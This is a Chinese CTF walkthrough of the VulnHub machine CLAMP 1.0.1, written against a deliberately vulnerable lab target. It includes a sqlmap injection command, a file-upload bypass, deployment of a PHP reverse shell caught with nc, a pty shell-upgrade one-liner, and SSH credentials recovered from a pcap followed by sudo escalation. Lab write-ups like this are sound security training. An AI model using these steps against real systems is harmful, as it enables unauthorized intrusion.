【vulnhub】CLAMP 1.0.1靶机

信息收集

靶机发现

端口扫描

页面访问,并查看源码

访问 /nt4stopc/,下面有一些问题,提示必须收集答案

一些判断题,对与错对应1与0,最后结果为0110111001,拼接访问

点击图中位置,发现存在参数,php语言,尝试注入

是存在注入的,使用 sqlmap 跑一下

复制代码
python3 sqlmap.py -u "http://192.168.93.162/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --batch --dbs

gereksiz 下得到一串值:

hihijrijrijr-balrgralrijr-htjrzhujrz-bfnf folder upload.php

解码后得到:

uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas

可能是路径,拼接访问

复制代码
http://192.168.93.162/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/

再拼接 upload.php

文件上传,以md5提交,但是没有提交按钮,自己在前端给加一个

<input type="submit">

获取shell

kali 生成反弹 shell

复制代码
locate php-reverse-shell.php
 
cp /usr/share/webshells/php/php-reverse-shell.php .
 
vim php-reverse-shell.php

上传该文件后,返回了文件路径,文件名为md5加密后的

nc监听,访问文件,成功反弹shell

提权

复制代码
python3 -c 'import pty;pty.spawn("/bin/bash")'

在 /var/www/html 下发现 important.pcapng,查看文件,发现内容

url解码,得到以下数据

复制代码
email=mkelepce&message=Hello there, The password for the SSH account you want is: mkelepce:mklpc-osas112. If you encounter a problem, just mail it.  Good work
 
账号密码:
mkelepce:mklpc-osas112.

ssh连接,连接成功

查看权限

sudo su 提权成功

相关推荐
白帽黑客沐瑶21 小时前
【网络安全就业】信息安全专业的就业前景(非常详细)零基础入门到精通,收藏这篇就够了
网络·安全·web安全·计算机·程序员·编程·网络安全就业
深盾安全21 小时前
符号执行技术实践-求解程序密码
安全
贾维思基1 天前
被监管警告后,我连夜给系统上了“双保险”!
安全
00后程序员张1 天前
iOS App 混淆与加固对比 源码混淆与ipa文件混淆的区别、iOS代码保护与应用安全场景最佳实践
android·安全·ios·小程序·uni-app·iphone·webview
Devil枫1 天前
鸿蒙深链落地实战:从安全解析到异常兜底的全链路设计
安全·华为·harmonyos
lubiii_1 天前
网络安全渗透测试第一步信息收集
安全·web安全·网络安全
你的人类朋友1 天前
🔒什么是HMAC
后端·安全·程序员
阿部多瑞 ABU2 天前
《基于国产Linux的机房终端安全重构方案》
linux·安全
小刘鸭地下城2 天前
内容安全策略(CSP)深度指南:从基础配置到高级防护
安全
内心如初2 天前
应急响应事件处理(网络安全体系架构与应急响应的前置知识)
安全·web安全